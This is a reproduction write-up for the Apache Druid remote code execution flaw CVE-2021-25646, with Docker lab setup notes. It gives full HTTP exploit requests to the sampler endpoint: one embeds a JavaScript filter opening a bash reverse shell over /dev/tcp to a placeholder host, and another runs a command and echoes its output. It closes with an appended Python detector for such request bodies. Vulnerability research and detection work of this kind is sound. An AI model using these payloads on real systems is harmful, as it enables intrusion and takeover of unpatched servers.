CVE-2021-25646 Apache Druid RCE Reproduction
Introduction
Druid is a high-performance data query system aimed mainly at aggregate queries over large volumes of time-series data. Data can be ingested in real time and becomes queryable as soon as it enters Druid, and it is almost never modified once stored. It is typically made up of time-series fact events: once a fact has occurred it is loaded into Druid, and external systems can then query it.
Affected versions
- <= 0.20.0
exp
Reverse shell:
POST /druid/indexer/v1/sampler HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1044
Connection: close
{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2020-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/xxx/xxx 0>&1')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
Reproduction
I wanted to debug the source code, but compiling it with maven kept failing with signature errors (and every build takes over ten minutes). Then I tried remote debugging through docker, but the debug port never came up and IDEA could not attach to that JVM. Very frustrating.
Docker deployment
Download the 0.20.0 source from the apache/druid GitHub repository: https://download.fastgit.org/apache/druid/archive/druid-0.20.0.zip
After extracting it, open the folder /distribution/docker and run docker-compose -f docker-compose.yml up to pull the images locally.
Since the vulnerability lives mainly in the coordinator container, if that component is stopped you will see the following error:
The web UI is deployed on port 8888 by default; opened in a browser it looks like this:
Exploitation
Click the Load Data button and you can see this request:
If you want the output echoed directly in the HTTP response, change function(value) in the request body to the following:
function(value) {var b=new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec('ls /').getInputStream()));var buffer = new java.lang.StringBuffer();var s='';while((s=b.readLine())!=null){buffer.append(s).append('\\n');}throw new java.lang.Exception(buffer.toString());}
Following the article by the QAX lab researchers, Druid can also echo the result directly by setting the return format =.=
POST /druid/indexer/v1/sampler HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1044
Connection: close
{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2020-12-12T12:10:21.040Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {var b=new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec('ls /').getInputStream()));var buffer = new java.lang.StringBuffer();var s='';while((s=b.readLine())!=null){buffer.append(s).append('\\n');}return {"res":buffer.toString()}}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}
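For the defender side, here is an added detection check (my own code, not part of the write-up or of Druid) that scans a body posted to /druid/indexer/v1/sampler for the two markers the requests above share: a "javascript"-typed filter or transform, and the empty-name key "" carrying {"enabled": true}, which is what switches JavaScript on server-side in this bug. The sample bodies are constructed, and the function body is replaced by a no-op.

```python
import json
from typing import Any, Iterator


def _walk(node: Any, path: str = "") -> Iterator[tuple[str, Any]]:
    """Depth-first walk yielding (JSON-pointer-like path, node) for every node."""
    yield path or "/", node
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _walk(value, f"{path}/{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from _walk(value, f"{path}/{index}")


def find_javascript_indicators(body: str) -> list[str]:
    """Return human-readable findings for one sampler request body (empty list = clean)."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return ["body is not valid JSON"]
    findings = []
    for path, node in _walk(doc):
        if not isinstance(node, dict):
            continue
        # Any javascript-typed spec object is worth flagging on an ingestion endpoint.
        if node.get("type") == "javascript":
            findings.append(f"javascript-typed object at {path}")
        # The empty property name is how the request overrides the JavaScriptConfig.
        override = node.get("")
        if isinstance(override, dict) and override.get("enabled") is True:
            findings.append(f"empty-name key enabling JavaScript at {path}")
    return findings


# Constructed sample bodies (not captured traffic): an ordinary selector filter,
# and one with the shape used in the write-up, function body replaced by a no-op.
SAFE_BODY = json.dumps({"type": "index", "spec": {"dataSchema": {"transformSpec": {
    "filter": {"type": "selector", "dimension": "added", "value": "1"}}}}})
SUSPICIOUS_BODY = json.dumps({"type": "index", "spec": {"dataSchema": {"transformSpec": {
    "filter": {"type": "javascript", "dimension": "added",
               "function": "function(value) { return true; }",
               "": {"enabled": True}}}}}})

if __name__ == "__main__":
    for name, body in (("safe", SAFE_BODY), ("suspicious", SUSPICIOUS_BODY)):
        print(name, find_javascript_indicators(body) or "no findings")
```

The same check can be run from a reverse proxy or WAF log pipeline; a hit on the empty-name override is a much stronger signal than the javascript type alone, which is legitimate when an operator has enabled it deliberately.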